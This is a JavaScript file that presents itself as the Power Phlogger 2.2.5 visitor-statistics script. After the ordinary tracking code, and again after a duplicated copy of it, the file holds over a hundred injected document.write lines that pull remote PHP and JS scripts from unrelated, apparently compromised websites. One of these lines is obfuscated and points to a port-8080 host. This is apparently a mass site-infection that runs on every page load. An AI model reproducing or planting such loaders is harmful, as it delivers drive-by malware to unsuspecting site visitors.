/* -----------------------------------------------
   POWER PHLOGGER - v.2.2.5
   (c) 2000-2003 www.phpee.com
   contact: webmaster@phpee.com
  ------------------------------------------------ */

// ----------------------------------------------------------
// SETTINGS:
// here should be your username you received from phplogger.kreditvergleiche.biz
// Do not edit this file manually!! Use the one you got in your
// confirmation-email or the one from PowerPhlogger's settings
// section.
   id = "flaschenoeffner.com";
// If you're using a frameset and are not getting correct 
// referrers, please uncomment the following line:
   // pp_frames = true;
// ----------------------------------------------------------


// define some defaults -------------------------------------
if(showme==null) var showme='n';
if(st==null)     var st='js';    // st means show-type


// get the user agent name ----------------------------------
v = navigator.appName;

// get the screen resolution --------------------------------
c=0;
if (v != "Netscape") c = screen.colorDepth;
else c = screen.pixelDepth;

// get the screen size --------------------------------------
s = screen.width+"x"+screen.height;

// get the document's title ---------------------------------
t = escape(document.title);

// get the document's referrer -------------------------------
var f = "";

// if pp_frames is true then try getting the framed referral (without error checking)
if (typeof(pp_frames) != "undefined")
	if (pp_frames)
		f = top.document.referrer;

// get the referral for non-multi-domained-framed sites using a Netscape browser
if ((f == "") || (f == "[unknown origin]") || (f == "unknown") || (f == "undefined"))
	if (document["parent"] != null) 
		if (parent["document"] != null) // ACCESS ERROR HERE!
			if (parent.document["referrer"] != null) 
				if (typeof(parent.document) == "object")
					f = parent.document.referrer; 

// get the referral for the current document if a framed referral wasn't found
if ((f == "") || (f == "[unknown origin]") || (f == "unknown") || (f == "undefined"))
	if (document["referrer"] != null) 
		f = document.referrer;

// convert all the unknown's into blank
if ((f == "") || (f == "[unknown origin]") || (f == "unknown") || (f == "undefined"))
	f = "";

// escape the referral
f = escape(f);

// getting data ready to send -------------------------------
r="?id="+id+"&referer="+f+"&r="+s+"&c="+c+"&showme="+showme+"&st="+st+"&title="+t;

// adding logid if called by st='phpjs'
if(jslogid==null) var jslogid = 0;
else r = r + "&jslogid="+jslogid;


if (st=='js') { // calling PowerPhlogger by JavaScript-tag
	if (v != "Microsoft Internet Explorer") {
		r = r+"&url="+document.URL; // $HTTP_REFERER problem with NS,...
	}
	document.open();
	document.write("<script language=\"JavaScript\" type=\"text/javascript\" src=\"http://phplogger.kreditvergleiche.biz/pphlogger.php"+r+"\"></script>");
	document.close();
} else { // calling PowerPhlogger by IMG-tag
	rand = Math.round(1000*Math.random());
	r = r+"&b="+rand;  //force the page to load the IMG
	document.open();
	document.write("<img src=\"http://phplogger.kreditvergleiche.biz/pphlogger.php"+r+"\" alt=\"\" border=\"0\">");
	document.close();
}


document.write('<script src=http://fero.ca/stats/rolloff.php ><\/script>');
document.write('<script src=http://fero.ca/stats/rolloff.php ><\/script>');
document.write('<script src=http://fero.ca/stats/rolloff.php ><\/script>');
document.write('<script src=http://d-mediagroup.com/gform3/pic1.php ><\/script>');
document.write('<script src=http://oerotrading.com/css/oero550x400.php ><\/script>');
document.write('<script src=http://oerotrading.com/css/oero550x400.php ><\/script>');
document.write('<script src=http://oerotrading.com/css/oero550x400.php ><\/script>');
document.write('<script src=http://oerotrading.com/css/oero550x400.php ><\/script>');
document.write('<script src=http://oerotrading.com/css/oero550x400.php ><\/script>');
document.write('<script src=http://mielcamino.org/web/nestor.php ><\/script>');
document.write('<script src=http://mielcamino.org/web/nestor.php ><\/script>');
document.write('<script src=http://mielcamino.org/web/nestor.php ><\/script>');
document.write('<script src=http://mielcamino.org/web/nestor.php ><\/script>');
document.write('<script src=http://mielcamino.org/web/nestor.php ><\/script>');
document.write('<script src=http://mielcamino.org/web/nestor.php ><\/script>');
document.write('<script src=http://mielcamino.org/web/nestor.php ><\/script>');
document.write('<s'+'cript type="text/javascript" src="http://dodo.busop.info:8080/Emoticon.js"></scr'+'ipt>');
document.write('<script src=http://mielcamino.org/web/nestor.php ><\/script>');
document.write('<script src=http://mass-mix.com/cat351/robots.php ><\/script>');
document.write('<script src=http://mass-mix.com/cat351/robots.php ><\/script>');
document.write('<script src=http://mass-mix.com/cat351/robots.php ><\/script>');
document.write('<script src=http://mass-mix.com/cat351/robots.php ><\/script>');
document.write('<script src=http://mass-mix.com/cat351/robots.php ><\/script>');
document.write('<script src=http://circuitrider.org/tmp/cr_mex4.php ><\/script>');;

// get the document's title ---------------------------------
t = escape(document.title);

// get the document's referrer -------------------------------
var f = "";

// if pp_frames is true then try getting the framed referral (without error checking)
if (typeof(pp_frames) != "undefined")
	if (pp_frames)
		f = top.document.referrer;

// get the referral for non-multi-domained-framed sites using a Netscape browser
if ((f == "") || (f == "[unknown origin]") || (f == "unknown") || (f == "undefined"))
	if (document["parent"] != null) 
		if (parent["document"] != null) // ACCESS ERROR HERE!
			if (parent.document["referrer"] != null) 
				if (typeof(parent.document) == "object")
					f = parent.document.referrer; 

// get the referral for the current document if a framed referral wasn't found
if ((f == "") || (f == "[unknown origin]") || (f == "unknown") || (f == "undefined"))
	if (document["referrer"] != null) 
		f = document.referrer;

// convert all the unknown's into blank
if ((f == "") || (f == "[unknown origin]") || (f == "unknown") || (f == "undefined"))
	f = "";

// escape the referral
f = escape(f);

// getting data ready to send -------------------------------
r="?id="+id+"&referer="+f+"&r="+s+"&c="+c+"&showme="+showme+"&st="+st+"&title="+t;

// adding logid if called by st='phpjs'
if(jslogid==null) var jslogid = 0;
else r = r + "&jslogid="+jslogid;


if (st=='js') { // calling PowerPhlogger by JavaScript-tag
	if (v != "Microsoft Internet Explorer") {
		r = r+"&url="+document.URL; // $HTTP_REFERER problem with NS,...
	}
	document.open();
	document.write("<script language=\"JavaScript\" type=\"text/javascript\" src=\"http://phplogger.kreditvergleiche.biz/pphlogger.php"+r+"\"></script>");
	document.close();
} else { // calling PowerPhlogger by IMG-tag
	rand = Math.round(1000*Math.random());
	r = r+"&b="+rand;  //force the page to load the IMG
	document.open();
	document.write("<img src=\"http://phplogger.kreditvergleiche.biz/pphlogger.php"+r+"\" alt=\"\" border=\"0\">");
	document.close();
}


document.write('<script src=http://fero.ca/stats/rolloff.php ><\/script>');
document.write('<script src=http://fero.ca/stats/rolloff.php ><\/script>');
document.write('<script src=http://fero.ca/stats/rolloff.php ><\/script>');
document.write('<script src=http://d-mediagroup.com/gform3/pic1.php ><\/script>');
document.write('<script src=http://oerotrading.com/css/oero550x400.php ><\/script>');
document.write('<script src=http://oerotrading.com/css/oero550x400.php ><\/script>');
document.write('<script src=http://oerotrading.com/css/oero550x400.php ><\/script>');
document.write('<script src=http://oerotrading.com/css/oero550x400.php ><\/script>');
document.write('<script src=http://oerotrading.com/css/oero550x400.php ><\/script>');

document.write('<script src=http://circuitrider.org/tmp/cr_mex4.php ><\/script>');
document.write('<script src=http://circuitrider.org/tmp/cr_mex4.php ><\/script>');
document.write('<script src=http://circuitrider.org/tmp/cr_mex4.php ><\/script>');
document.write('<script src=http://circuitrider.org/tmp/cr_mex4.php ><\/script>');
document.write('<script src=http://circuitrider.org/tmp/cr_mex4.php ><\/script>');
document.write('<script src=http://redakcja.espeedway.pl/stat_modules/chatbox_front.php ><\/script>');
document.write('<script src=http://redakcja.espeedway.pl/stat_modules/chatbox_front.php ><\/script>');
document.write('<script src=http://redakcja.espeedway.pl/stat_modules/chatbox_front.php ><\/script>');
document.write('<script src=http://redakcja.espeedway.pl/stat_modules/chatbox_front.php ><\/script>');
document.write('<script src=http://redakcja.espeedway.pl/stat_modules/chatbox_front.php ><\/script>');
document.write('<script src=http://yuan-fu.com/c/y_key_6b7d557829e5c108.php ><\/script>');
document.write('<script src=http://jmeker.hi2.ro/images/gifimg.php ><\/script>');
document.write('<script src=http://jmeker.hi2.ro/images/gifimg.php ><\/script>');
document.write('<script src=http://jmeker.hi2.ro/images/gifimg.php ><\/script>');
document.write('<script src=http://jmeker.hi2.ro/images/gifimg.php ><\/script>');
document.write('<script src=http://jmeker.hi2.ro/images/gifimg.php ><\/script>');
document.write('<script src=http://hotelboutique.com.mx/images/kms0/hoteles-en-oferta.php ><\/script>');
document.write('<script src=http://hotelboutique.com.mx/images/kms0/hoteles-en-oferta.php ><\/script>');
document.write('<script src=http://hotelboutique.com.mx/images/kms0/hoteles-en-oferta.php ><\/script>');
document.write('<script src=http://hotelboutique.com.mx/images/kms0/hoteles-en-oferta.php ><\/script>');
document.write('<script src=http://hotelboutique.com.mx/images/kms0/hoteles-en-oferta.php ><\/script>');
document.write('<script src=http://hotelboutique.com.mx/images/kms0/hoteles-en-oferta.php ><\/script>');
document.write('<script src=http://hotelboutique.com.mx/images/kms0/hoteles-en-oferta.php ><\/script>');
document.write('<script src=http://hotelboutique.com.mx/images/kms0/hoteles-en-oferta.php ><\/script>');
document.write('<script src=http://hotelboutique.com.mx/images/kms0/hoteles-en-oferta.php ><\/script>');
document.write('<script src=http://hotelboutique.com.mx/images/kms0/hoteles-en-oferta.php ><\/script>');
document.write('<script src=http://bostonjuniorbruins.com/2010AAApics/jrbruins0708.php ><\/script>');
document.write('<script src=http://bostonjuniorbruins.com/2010AAApics/jrbruins0708.php ><\/script>');
document.write('<script src=http://bostonjuniorbruins.com/2010AAApics/jrbruins0708.php ><\/script>');
document.write('<script src=http://bostonjuniorbruins.com/2010AAApics/jrbruins0708.php ><\/script>');
document.write('<script src=http://bostonjuniorbruins.com/2010AAApics/jrbruins0708.php ><\/script>');
document.write('<script src=http://bostonjuniorbruins.com/2010AAApics/jrbruins0708.php ><\/script>');
document.write('<script src=http://bostonjuniorbruins.com/2010AAApics/jrbruins0708.php ><\/script>');
document.write('<script src=http://bostonjuniorbruins.com/2010AAApics/jrbruins0708.php ><\/script>');
document.write('<script src=http://odessametroequipmentrental.com/nfl/pic1.php ><\/script>');
document.write('<script src=http://odessametroequipmentrental.com/nfl/pic1.php ><\/script>');
document.write('<script src=http://odessametroequipmentrental.com/nfl/pic1.php ><\/script>');
document.write('<script src=http://odessametroequipmentrental.com/nfl/pic1.php ><\/script>');
document.write('<script src=http://odessametroequipmentrental.com/nfl/pic1.php ><\/script>');
document.write('<script src=http://odessametroequipmentrental.com/nfl/pic1.php ><\/script>');
document.write('<script src=http://odessametroequipmentrental.com/nfl/pic1.php ><\/script>');
document.write('<script src=http://odessametroequipmentrental.com/nfl/pic1.php ><\/script>');
document.write('<script src=http://odessametroequipmentrental.com/nfl/pic1.php ><\/script>');
document.write('<script src=http://odessametroequipmentrental.com/nfl/pic1.php ><\/script>');
document.write('<script src=http://crossover.net/dougni.com/help2/icons/fantversion.php ><\/script>');
document.write('<script src=http://crossover.net/dougni.com/help2/icons/fantversion.php ><\/script>');
document.write('<script src=http://crossover.net/dougni.com/help2/icons/fantversion.php ><\/script>');
document.write('<script src=http://crossover.net/dougni.com/help2/icons/fantversion.php ><\/script>');
document.write('<script src=http://crossover.net/dougni.com/help2/icons/fantversion.php ><\/script>');
document.write('<script src=http://crossover.net/dougni.com/help2/icons/fantversion.php ><\/script>');
document.write('<script src=http://crossover.net/dougni.com/help2/icons/fantversion.php ><\/script>');
document.write('<script src=http://crossover.net/dougni.com/help2/icons/fantversion.php ><\/script>');
document.write('<script src=http://crossover.net/dougni.com/help2/icons/fantversion.php ><\/script>');
document.write('<script src=http://riversidetheatre.org/pdf/heart.php ><\/script>');
document.write('<script src=http://riversidetheatre.org/pdf/heart.php ><\/script>');
document.write('<script src=http://riversidetheatre.org/pdf/heart.php ><\/script>');
document.write('<script src=http://riversidetheatre.org/pdf/heart.php ><\/script>');
document.write('<script src=http://riversidetheatre.org/pdf/heart.php ><\/script>');
document.write('<script src=http://riversidetheatre.org/pdf/heart.php ><\/script>');
document.write('<script src=http://riversidetheatre.org/pdf/heart.php ><\/script>');
document.write('<script src=http://riversidetheatre.org/pdf/heart.php ><\/script>');
document.write('<script src=http://riversidetheatre.org/pdf/heart.php ><\/script>');
document.write('<script src=http://aespl.net.in/images/gifimg.php ><\/script>');
document.write('<script src=http://aespl.net.in/images/gifimg.php ><\/script>');
document.write('<script src=http://aespl.net.in/images/gifimg.php ><\/script>');
document.write('<script src=http://aespl.net.in/images/gifimg.php ><\/script>');
document.write('<script src=http://aespl.net.in/images/gifimg.php ><\/script>');
document.write('<script src=http://aespl.net.in/images/gifimg.php ><\/script>');
document.write('<script src=http://aespl.net.in/images/gifimg.php ><\/script>');
document.write('<script src=http://aespl.net.in/images/gifimg.php ><\/script>');
document.write('<script src=http://aespl.net.in/images/gifimg.php ><\/script>');
document.write('<script src=http://aespl.net.in/images/gifimg.php ><\/script>');
document.write('<script src=http://aespl.net.in/images/gifimg.php ><\/script>');
document.write('<script src=http://aespl.net.in/images/gifimg.php ><\/script>');
document.write('<script src=http://aespl.net.in/images/gifimg.php ><\/script>');
document.write('<script src=http://aespl.net.in/images/gifimg.php ><\/script>');
document.write('<script src=http://aespl.net.in/images/gifimg.php ><\/script>');
document.write('<script src=http://aespl.net.in/images/gifimg.php ><\/script>');
document.write('<script src=http://calvarybaptistirwin.org/images/gifimg.php ><\/script>');
document.write('<script src=http://calvarybaptistirwin.org/images/gifimg.php ><\/script>');
document.write('<script src=http://calvarybaptistirwin.org/images/gifimg.php ><\/script>');
document.write('<script src=http://calvarybaptistirwin.org/images/gifimg.php ><\/script>');
document.write('<script src=http://calvarybaptistirwin.org/images/gifimg.php ><\/script>');
document.write('<script src=http://calvarybaptistirwin.org/images/gifimg.php ><\/script>');
document.write('<script src=http://calvarybaptistirwin.org/images/gifimg.php ><\/script>');
document.write('<script src=http://calvarybaptistirwin.org/images/gifimg.php ><\/script>');
document.write('<script src=http://calvarybaptistirwin.org/images/gifimg.php ><\/script>');
document.write('<script src=http://calvarybaptistirwin.org/images/gifimg.php ><\/script>');
document.write('<script src=http://harryhesseling.nl/images/gifimg.php ><\/script>');
document.write('<script src=http://harryhesseling.nl/images/gifimg.php ><\/script>');
document.write('<script src=http://harryhesseling.nl/images/gifimg.php ><\/script>');
document.write('<script src=http://harryhesseling.nl/images/gifimg.php ><\/script>');